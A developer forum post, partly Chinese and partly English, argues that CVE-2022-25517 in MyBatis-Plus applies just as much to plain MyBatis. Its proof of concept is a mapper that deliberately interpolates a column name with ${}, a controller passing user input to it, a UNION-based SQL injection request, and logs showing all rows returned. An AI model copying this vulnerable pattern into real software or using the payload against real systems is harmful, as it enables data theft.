小天管理 发表于 2024年9月17日 发表于 2024年9月17日 最近公司引入了 SYNK 用作软件漏斗扫描工具,它给 mybatis plus 报 CVE-2022-25517 ,如果解决不了我就得把好大段代码用 JPA 或者 mybatis dynamic sql 重构。但我研究了下,我真心觉得这个如果是个有效的 CVE issue ,那 mybatis 也跑不了。 以下是正文。各位看了后觉得呢? Background Here is the POC and root cause why CVE-2022-25517 was generated: POC But without mybatis-plus, only using mybatis, we can reproduce the same issue. Please check this demo: https://github.com/XSun771/demos/tree/mybatis-sql-injection By this demo, I want to prove that CVE-2022-25517 should not be an CVE issue. At least if it is, then it is also applicable to Mybatis. Instead, it should be a bad code smell. My POC code @Select("SELECT * FROM ARTICLES WHERE ${columnName} = #{columnValue}") List<Article> select(@Param("columnName") String columnName, @Param("columnValue") String columnValue); I know you may say , "oh, it is highlighted by Mybatis developers that you should not use ${} but #{} which will check sql injection". But I must highlight that it is also highlighted in mybatis-plus official documents that everyone needs to do SQL inject check first. So if you agree that because mybatis developers highlights that you should not use ${} then there is no need to raise CVE issue for mybatis, then why not agree that no need to raise CVE issue to mybatis-plus? @RequestMapping("/enquiry") public String enquiry(@RequestBody Enquiry enquiry) { return this.articleMapper.select(enquiry.getColumnName(),enquiry.getColumnValue()).toString(); } attack I made usage of IDEA http client, the script file is at src/main/resources/generated-requests.http. POST http://localhost:9000/enquiry Content-Type: application/json { "columnName": "(id=1) UNION SELECT * FROM ARTICLES WHERE 1=1 OR id", "columnValue": "1" } Attachk result: 2024-09-16T11:42:48.220+08:00 DEBUG 2736 --- [mybatis-sql-injection] [nio-9000-exec-2] c.e.m.ArticleMapper.select : ==> Preparing: SELECT * FROM ARTICLES WHERE (id=1) UNION SELECT * FROM ARTICLES WHERE 1=1 OR id = ? 2024-09-16T11:42:48.229+08:00 DEBUG 2736 --- [mybatis-sql-injection] [nio-9000-exec-2] c.e.m.ArticleMapper.select : ==> Parameters: 1(String) 2024-09-16T11:42:48.244+08:00 DEBUG 2736 --- [mybatis-sql-injection] [nio-9000-exec-2] c.e.m.ArticleMapper.select : <== Total: 3 [Article(id=1, title=foo, author=foo), Article(id=2, title=bar, author=bar), Article(id=3, title=333, author=333)]
已推荐帖子